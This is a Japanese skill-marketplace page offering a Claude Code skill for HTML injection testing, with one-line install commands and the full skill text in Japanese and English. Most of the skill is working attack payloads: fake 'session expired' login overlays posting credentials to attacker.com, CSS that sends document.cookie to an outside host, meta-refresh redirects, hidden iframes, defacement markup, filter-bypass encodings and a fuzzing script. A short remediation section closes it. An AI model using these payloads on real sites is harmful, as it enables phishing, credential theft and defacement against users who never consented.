jpskill.com
🛠️ 開発・MCP コミュニティ 🔴 エンジニア向け 👤 エンジニア・AI開発者

🛠️ HTMLInjectionテスト

html-injection-testing

ウェブアプリケーションに悪意のあるHTMLを挿入し、ページの改ざんやフィッシング詐欺、ユーザー情報の窃取を可能にする脆弱性を特定・悪用するSkill。

⏱ コードレビュー 1時間 → 10分

📺 まず動画で見る(YouTube)

▶ 【衝撃】最強のAIエージェント「Claude Code」の最新機能・使い方・プログラミングをAIで効率化する超実践術を解説! ↗

※ jpskill.com 編集部が参考用に選んだ動画です。動画の内容と Skill の挙動は厳密には一致しないことがあります。

📜 元の英語説明(参考)

Identify and exploit HTML injection vulnerabilities that allow attackers to inject malicious HTML content into web applications. This vulnerability enables attackers to modify page appearance, create phishing pages, and steal user credentials through injected forms.

🇯🇵 日本人クリエイター向け解説

一言でいうと

ウェブアプリケーションに悪意のあるHTMLを挿入し、ページの改ざんやフィッシング詐欺、ユーザー情報の窃取を可能にする脆弱性を特定・悪用するSkill。

※ jpskill.com 編集部が日本のビジネス現場向けに補足した解説です。Skill本体の挙動とは独立した参考情報です。

⚡ おすすめ: コマンド1行でインストール(60秒)

下記のコマンドをコピーしてターミナル(Mac/Linux)または PowerShell(Windows)に貼り付けてください。 ダウンロード → 解凍 → 配置まで全自動。

🍎 Mac / 🐧 Linux 
mkdir -p ~/.claude/skills && cd ~/.claude/skills && curl -L -o html-injection-testing.zip https://jpskill.com/download/2983.zip && unzip -o html-injection-testing.zip && rm html-injection-testing.zip
🪟 Windows (PowerShell) 
$d = "$env:USERPROFILE\.claude\skills"; ni -Force -ItemType Directory $d | Out-Null; iwr https://jpskill.com/download/2983.zip -OutFile "$d\html-injection-testing.zip"; Expand-Archive "$d\html-injection-testing.zip" -DestinationPath $d -Force; ri "$d\html-injection-testing.zip"

完了後、Claude Code を再起動 → 普通に「動画プロンプト作って」のように話しかけるだけで自動発動します。

💾 手動でダウンロードしたい(コマンドが難しい人向け)
  1. 1. 下の青いボタンを押して html-injection-testing.zip をダウンロード
  2. 2. ZIPファイルをダブルクリックで解凍 → html-injection-testing フォルダができる
  3. 3. そのフォルダを C:\Users\あなたの名前\.claude\skills\(Win)または ~/.claude/skills/(Mac)へ移動
  4. 4. Claude Code を再起動
⬇ .zip でダウンロード(推奨) ⬇ .skill 形式(上級者用) 元のソース ↗

⚠️ ダウンロード・利用は自己責任でお願いします。当サイトは内容・動作・安全性について責任を負いません。

🎯 このSkillでできること

下記の説明文を読むと、このSkillがあなたに何をしてくれるかが分かります。Claudeにこの分野の依頼をすると、自動で発動します。

📦 インストール方法 (3ステップ)

  1. 1. 上の「ダウンロード」ボタンを押して .skill ファイルを取得
  2. 2. ファイル名の拡張子を .skill から .zip に変えて展開(macは自動展開可)
  3. 3. 展開してできたフォルダを、ホームフォルダの .claude/skills/ に置く
    • · macOS / Linux: ~/.claude/skills/
    • · Windows: %USERPROFILE%\.claude\skills\

Claude Code を再起動すれば完了。「このSkillを使って…」と話しかけなくても、関連する依頼で自動的に呼び出されます。

詳しい使い方ガイドを見る →
最終更新
2026-05-17
取得日時
2026-05-17
同梱ファイル
1

💬 こう話しかけるだけ — サンプルプロンプト

  • Html Injection Testing を使って、最小構成のサンプルコードを示して
  • Html Injection Testing の主な使い方と注意点を教えて
  • Html Injection Testing を既存プロジェクトに組み込む方法を教えて

これをClaude Code に貼るだけで、このSkillが自動発動します。

📖 Skill本文(日本語訳)

※ 原文(英語/中国語)を Gemini で日本語化したものです。Claude 自身は原文を読みます。誤訳がある場合は原文をご確認ください。

[Skill 名] html-injection-testing AUTHORIZED USE ONLY: このスキルは、許可されたセキュリティ評価、防御的検証、または管理された教育環境でのみ使用してください。

HTMLインジェクションテスト

目的

攻撃者が悪意のあるHTMLコンテンツをWebアプリケーションに注入することを可能にするHTMLインジェクションの脆弱性を特定し、悪用します。この脆弱性により、攻撃者はページの表示を変更したり、フィッシングページを作成したり、注入されたフォームを通じてユーザーの認証情報を盗んだりすることができます。

前提条件

必須ツール

  • 開発者ツールを備えたWebブラウザ
  • Burp Suite または OWASP ZAP
  • Tamper Data または同様のプロキシ
  • ペイロードテスト用の cURL

必須知識

  • HTMLの基礎
  • HTTPリクエスト/レスポンスの構造
  • Webアプリケーションの入力処理
  • HTMLインジェクションとXSSの違い

成果物と納品物

  1. 脆弱性レポート - 特定されたインジェクションポイント
  2. 悪用証明 - 実証されたコンテンツ操作
  3. 影響評価 - 潜在的なフィッシングおよび改ざんのリスク
  4. 修正ガイダンス - 入力検証の推奨事項

コアワークフロー

フェーズ1: HTMLインジェクションの理解

HTMLインジェクションは、ユーザー入力が適切なサニタイズなしにWebページに反映されるときに発生します。

<!-- 脆弱なコード例 -->
<div>
    Welcome, <?php echo $_GET['name']; ?>
</div>

<!-- 攻撃入力 -->
?name=<h1>Injected Content</h1>

<!-- レンダリングされた出力 -->
<div>
    Welcome, <h1>Injected Content</h1>
</div>

XSSとの主な違い:

  • HTMLインジェクション: HTMLタグのみがレンダリングされます
  • XSS: JavaScriptコードが実行されます
  • HTMLインジェクションはXSSへの足がかりとなることが多いです

攻撃の目的:

  • ウェブサイトの表示を変更する(改ざん)
  • 偽のログインフォームを作成する(フィッシング)
  • 悪意のあるリンクを注入する
  • 誤解を招くコンテンツを表示する

フェーズ2: インジェクションポイントの特定

潜在的なインジェクション面についてアプリケーションをマッピングします。

1. 検索バーと検索結果
2. コメントセクション
3. ユーザープロファイルフィールド
4. お問い合わせフォームとフィードバック
5. 登録フォーム
6. ページに反映されるURLパラメータ
7. エラーメッセージ
8. ページタイトルとヘッダー
9. 隠しフォームフィールド
10. ページに反映されるCookieの値

一般的な脆弱なパラメータ:

?name=
?user=
?search=
?query=
?message=
?title=
?content=
?redirect=
?url=
?page=

フェーズ3: 基本的なHTMLインジェクションテスト

単純なHTMLタグでテストします。

<!-- 基本的なテキスト書式設定 -->
<h1>Test Injection</h1>
<b>Bold Text</b>
<i>Italic Text</i>
<u>Underlined Text</u>
<font color="red">Red Text</font>

<!-- 構造要素 -->
<div style="background:red;color:white;padding:10px">Injected DIV</div>
<p>Injected paragraph</p>
<br><br><br>Line breaks

<!-- リンク -->
<a href="http://attacker.com">Click Here</a>
<a href="http://attacker.com">Legitimate Link</a>

<!-- 画像 -->
<img src="http://attacker.com/image.png">
<img src="x" onerror="alert(1)">  <!-- XSS試行 -->

テストワークフロー:

# 基本的なインジェクションをテスト
curl "http://target.com/search?q=<h1>Test</h1>"

# レスポンスでHTMLがレンダリングされるか確認
curl -s "http://target.com/search?q=<b>Bold</b>" | grep -i "bold"

# URLエンコード形式でテスト
curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E"

フェーズ4: HTMLインジェクションの種類

ストアドHTMLインジェクション

ペイロードがデータベースに永続化されます。

<!-- プロフィールバイオのインジェクション -->
Name: John Doe
Bio: <div style="position:absolute;top:0;left:0;width:100%;height:100%;background:white;">
     <h1>Site Under Maintenance</h1>
     <p>Please login at <a href="http://attacker.com/login">portal.company.com</a></p>
     </div>

<!-- コメントのインジェクション -->
Great article!
<form action="http://attacker.com/steal" method="POST">
    <input name="username" placeholder="Session expired. Enter username:">
    <input name="password" type="password" placeholder="Password:">
    <input type="submit" value="Login">
</form>

リフレクテッドGETインジェクション

ペイロードがURLパラメータに含まれます。

<!-- URLインジェクション -->
http://target.com/welcome?name=<h1>Welcome%20Admin</h1><form%20action="http://attacker.com/steal">

<!-- 検索結果のインジェクション -->
http://target.com/search?q=<marquee>Your%20account%20has%20been%20compromised</marquee>

リフレクテッドPOSTインジェクション

ペイロードがPOSTデータに含まれます。

# POSTインジェクションテスト
curl -X POST -d "comment=<div style='color:red'>Malicious Content</div>" \
     http://target.com/submit

# フォームフィールドのインジェクション
curl -X POST -d "name=<script>alert(1)</script>&email=test@test.com" \
     http://target.com/register

URLベースのインジェクション

表示されるURLに注入します。

<!-- URLがページに表示される場合 -->
http://target.com/page/<h1>Injected</h1>

<!-- パスベースのインジェクション -->
http://target.com/users/<img src=x>/profile

フェーズ5: フィッシング攻撃の構築

説得力のあるフィッシングフォームを作成します。

<!-- 偽のログインフォームオーバーレイ -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%;
            background:white;z-index:9999;padding:50px;">
    <h2>Session Expired</h2>
    <p>Your session has expired. Please log in again.</p>
    <form action="http://attacker.com/capture" method="POST">
        <label>Username:</label><br>
        <input type="text" name="username" style="width:200px;"><br><br>
        <label>Password:</label><br>
        <input type="password" name="password" style="width:200px;"><br><br>
        <input type="submit" value="Login">
    </form>
</div>

<!-- 隠された認証情報窃盗 -->
<style>
    input { background: url('http://attacker.com/log?data=') }
</style>
<form action="http://attacker.com/steal" method="POST">
    <input name="user" placeholder="Verify your username">
    <input name="pass" type="password" placeholder="Verify your password">
    <button>Verify</button>
</form>

URLエンコードされたフィッシングリンク:

http://target.com/page?msg=%3Cdiv%20style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3Bbackground%3Awhite%3Bz-index%3A9999%3Bpadding%3A50px%3B%22%3E%3Ch2%3ESession%20Expired%3C%2Fh2%3E%3Cform%20action%3D%22http%3A%2F%2Fattacker.com%2Fcapture%22%3E%3Cin
📜 原文 SKILL.md(Claudeが読む英語/中国語)を展開

AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.

HTML Injection Testing

Purpose

Identify and exploit HTML injection vulnerabilities that allow attackers to inject malicious HTML content into web applications. This vulnerability enables attackers to modify page appearance, create phishing pages, and steal user credentials through injected forms.

Prerequisites

Required Tools

  • Web browser with developer tools
  • Burp Suite or OWASP ZAP
  • Tamper Data or similar proxy
  • cURL for testing payloads

Required Knowledge

  • HTML fundamentals
  • HTTP request/response structure
  • Web application input handling
  • Difference between HTML injection and XSS

Outputs and Deliverables

  1. Vulnerability Report - Identified injection points
  2. Exploitation Proof - Demonstrated content manipulation
  3. Impact Assessment - Potential phishing and defacement risks
  4. Remediation Guidance - Input validation recommendations

Core Workflow

Phase 1: Understanding HTML Injection

HTML injection occurs when user input is reflected in web pages without proper sanitization:

<!-- Vulnerable code example -->
<div>
    Welcome, <?php echo $_GET['name']; ?>
</div>

<!-- Attack input -->
?name=<h1>Injected Content</h1>

<!-- Rendered output -->
<div>
    Welcome, <h1>Injected Content</h1>
</div>

Key differences from XSS:

  • HTML injection: Only HTML tags are rendered
  • XSS: JavaScript code is executed
  • HTML injection is often stepping stone to XSS

Attack goals:

  • Modify website appearance (defacement)
  • Create fake login forms (phishing)
  • Inject malicious links
  • Display misleading content

Phase 2: Identifying Injection Points

Map application for potential injection surfaces:

1. Search bars and search results
2. Comment sections
3. User profile fields
4. Contact forms and feedback
5. Registration forms
6. URL parameters reflected on page
7. Error messages
8. Page titles and headers
9. Hidden form fields
10. Cookie values reflected on page

Common vulnerable parameters:

?name=
?user=
?search=
?query=
?message=
?title=
?content=
?redirect=
?url=
?page=

Phase 3: Basic HTML Injection Testing

Test with simple HTML tags:

<!-- Basic text formatting -->
<h1>Test Injection</h1>
<b>Bold Text</b>
<i>Italic Text</i>
<u>Underlined Text</u>
<font color="red">Red Text</font>

<!-- Structural elements -->
<div style="background:red;color:white;padding:10px">Injected DIV</div>
<p>Injected paragraph</p>
<br><br><br>Line breaks

<!-- Links -->
<a href="http://attacker.com">Click Here</a>
<a href="http://attacker.com">Legitimate Link</a>

<!-- Images -->
<img src="http://attacker.com/image.png">
<img src="x" onerror="alert(1)">  <!-- XSS attempt -->

Testing workflow:

# Test basic injection
curl "http://target.com/search?q=<h1>Test</h1>"

# Check if HTML renders in response
curl -s "http://target.com/search?q=<b>Bold</b>" | grep -i "bold"

# Test in URL-encoded form
curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E"

Phase 4: Types of HTML Injection

Stored HTML Injection

Payload persists in database:

<!-- Profile bio injection -->
Name: John Doe
Bio: <div style="position:absolute;top:0;left:0;width:100%;height:100%;background:white;">
     <h1>Site Under Maintenance</h1>
     <p>Please login at <a href="http://attacker.com/login">portal.company.com</a></p>
     </div>

<!-- Comment injection -->
Great article!
<form action="http://attacker.com/steal" method="POST">
    <input name="username" placeholder="Session expired. Enter username:">
    <input name="password" type="password" placeholder="Password:">
    <input type="submit" value="Login">
</form>

Reflected GET Injection

Payload in URL parameters:

<!-- URL injection -->
http://target.com/welcome?name=<h1>Welcome%20Admin</h1><form%20action="http://attacker.com/steal">

<!-- Search result injection -->
http://target.com/search?q=<marquee>Your%20account%20has%20been%20compromised</marquee>

Reflected POST Injection

Payload in POST data:

# POST injection test
curl -X POST -d "comment=<div style='color:red'>Malicious Content</div>" \
     http://target.com/submit

# Form field injection
curl -X POST -d "name=<script>alert(1)</script>&email=test@test.com" \
     http://target.com/register

URL-Based Injection

Inject into displayed URLs:

<!-- If URL is displayed on page -->
http://target.com/page/<h1>Injected</h1>

<!-- Path-based injection -->
http://target.com/users/<img src=x>/profile

Phase 5: Phishing Attack Construction

Create convincing phishing forms:

<!-- Fake login form overlay -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%;
            background:white;z-index:9999;padding:50px;">
    <h2>Session Expired</h2>
    <p>Your session has expired. Please log in again.</p>
    <form action="http://attacker.com/capture" method="POST">
        <label>Username:</label><br>
        <input type="text" name="username" style="width:200px;"><br><br>
        <label>Password:</label><br>
        <input type="password" name="password" style="width:200px;"><br><br>
        <input type="submit" value="Login">
    </form>
</div>

<!-- Hidden credential stealer -->
<style>
    input { background: url('http://attacker.com/log?data=') }
</style>
<form action="http://attacker.com/steal" method="POST">
    <input name="user" placeholder="Verify your username">
    <input name="pass" type="password" placeholder="Verify your password">
    <button>Verify</button>
</form>

URL-encoded phishing link:

http://target.com/page?msg=%3Cdiv%20style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3Bbackground%3Awhite%3Bz-index%3A9999%3Bpadding%3A50px%3B%22%3E%3Ch2%3ESession%20Expired%3C%2Fh2%3E%3Cform%20action%3D%22http%3A%2F%2Fattacker.com%2Fcapture%22%3E%3Cinput%20name%3D%22user%22%20placeholder%3D%22Username%22%3E%3Cinput%20name%3D%22pass%22%20type%3D%22password%22%3E%3Cbutton%3ELogin%3C%2Fbutton%3E%3C%2Fform%3E%3C%2Fdiv%3E

Phase 6: Defacement Payloads

Website appearance manipulation:

<!-- Full page overlay -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%;
            background:#000;color:#0f0;z-index:9999;
            display:flex;justify-content:center;align-items:center;">
    <h1>HACKED BY SECURITY TESTER</h1>
</div>

<!-- Content replacement -->
<style>body{display:none}</style>
<body style="display:block !important">
    <h1>This site has been compromised</h1>
</body>

<!-- Image injection -->
<img src="http://attacker.com/defaced.jpg" 
     style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999">

<!-- Marquee injection (visible movement) -->
<marquee behavior="alternate" style="font-size:50px;color:red;">
    SECURITY VULNERABILITY DETECTED
</marquee>

Phase 7: Advanced Injection Techniques

CSS Injection

<!-- Style injection -->
<style>
    body { background: url('http://attacker.com/track?cookie='+document.cookie) }
    .content { display: none }
    .fake-content { display: block }
</style>

<!-- Inline style injection -->
<div style="background:url('http://attacker.com/log')">Content</div>

Meta Tag Injection

<!-- Redirect via meta refresh -->
<meta http-equiv="refresh" content="0;url=http://attacker.com/phish">

<!-- CSP bypass attempt -->
<meta http-equiv="Content-Security-Policy" content="default-src *">

Form Action Override

<!-- Hijack existing form -->
<form action="http://attacker.com/steal">

<!-- If form already exists, add input -->
<input type="hidden" name="extra" value="data">
</form>

iframe Injection

<!-- Embed external content -->
<iframe src="http://attacker.com/malicious" width="100%" height="500"></iframe>

<!-- Invisible tracking iframe -->
<iframe src="http://attacker.com/track" style="display:none"></iframe>

Phase 8: Bypass Techniques

Evade basic filters:

<!-- Case variations -->
<H1>Test</H1>
<ScRiPt>alert(1)</ScRiPt>

<!-- Encoding variations -->
&#60;h1&#62;Encoded&#60;/h1&#62;
%3Ch1%3EURL%20Encoded%3C%2Fh1%3E

<!-- Tag splitting -->
<h
1>Split Tag</h1>

<!-- Null bytes -->
<h1%00>Null Byte</h1>

<!-- Double encoding -->
%253Ch1%253EDouble%2520Encoded%253C%252Fh1%253E

<!-- Unicode encoding -->
\u003ch1\u003eUnicode\u003c/h1\u003e

<!-- Attribute-based -->
<div onmouseover="alert(1)">Hover me</div>
<img src=x onerror=alert(1)>

Phase 9: Automated Testing

Using Burp Suite

1. Capture request with potential injection point
2. Send to Intruder
3. Mark parameter value as payload position
4. Load HTML injection wordlist
5. Start attack
6. Filter responses for rendered HTML
7. Manually verify successful injections

Using OWASP ZAP

1. Spider the target application
2. Active Scan with HTML injection rules
3. Review Alerts for injection findings
4. Validate findings manually

Custom Fuzzing Script

#!/usr/bin/env python3
import requests
import urllib.parse

target = "http://target.com/search"
param = "q"

payloads = [
    "<h1>Test</h1>",
    "<b>Bold</b>",
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "<a href='http://evil.com'>Click</a>",
    "<div style='color:red'>Styled</div>",
    "<marquee>Moving</marquee>",
    "<iframe src='http://evil.com'></iframe>",
]

for payload in payloads:
    encoded = urllib.parse.quote(payload)
    url = f"{target}?{param}={encoded}"

    try:
        response = requests.get(url, timeout=5)
        if payload.lower() in response.text.lower():
            print(f"[+] Possible injection: {payload}")
        elif "<h1>" in response.text or "<b>" in response.text:
            print(f"[?] Partial reflection: {payload}")
    except Exception as e:
        print(f"[-] Error: {e}")

Phase 10: Prevention and Remediation

Secure coding practices:

// PHP: Escape output
echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

// PHP: Strip tags
echo strip_tags($user_input);

// PHP: Allow specific tags only
echo strip_tags($user_input, '<p><b><i>');
# Python: HTML escape
from html import escape
safe_output = escape(user_input)

# Python Flask: Auto-escaping
{{ user_input }}  # Jinja2 escapes by default
{{ user_input | safe }}  # Marks as safe (dangerous!)
// JavaScript: Text content (safe)
element.textContent = userInput;

// JavaScript: innerHTML (dangerous!)
element.innerHTML = userInput;  // Vulnerable!

// JavaScript: Sanitize
const clean = DOMPurify.sanitize(userInput);
element.innerHTML = clean;

Server-side protections:

  • Input validation (whitelist allowed characters)
  • Output encoding (context-aware escaping)
  • Content Security Policy (CSP) headers
  • Web Application Firewall (WAF) rules

Quick Reference

Common Test Payloads

Payload Purpose
<h1>Test</h1> Basic rendering test
<b>Bold</b> Simple formatting
<a href="evil.com">Link</a> Link injection
<img src=x> Image tag test
<div style="color:red"> Style injection
<form action="evil.com"> Form hijacking

Injection Contexts

Context Test Approach
URL parameter ?param=<h1>test</h1>
Form field POST with HTML payload
Cookie value Inject via document.cookie
HTTP header Inject in Referer/User-Agent
File upload HTML file with malicious content

Encoding Types

Type Example
URL encoding %3Ch1%3E = <h1>
HTML entities &#60;h1&#62; = <h1>
Double encoding %253C = <
Unicode \u003c = <

Constraints and Limitations

Attack Limitations

  • Modern browsers may sanitize some injections
  • CSP can prevent inline styles and scripts
  • WAFs may block common payloads
  • Some applications escape output properly

Testing Considerations

  • Distinguish between HTML injection and XSS
  • Verify visual impact in browser
  • Test in multiple browsers
  • Check for stored vs reflected

Severity Assessment

  • Lower severity than XSS (no script execution)
  • Higher impact when combined with phishing
  • Consider defacement/reputation damage
  • Evaluate credential theft potential

Troubleshooting

Issue Solutions
HTML not rendering Check if output HTML-encoded; try encoding variations; verify HTML context
Payload stripped Use encoding variations; try tag splitting; test null bytes; nested tags
XSS not working (HTML only) JS filtered but HTML allowed; leverage phishing forms, meta refresh redirects

When to Use

This skill is applicable to execute the workflow or actions described in the overview.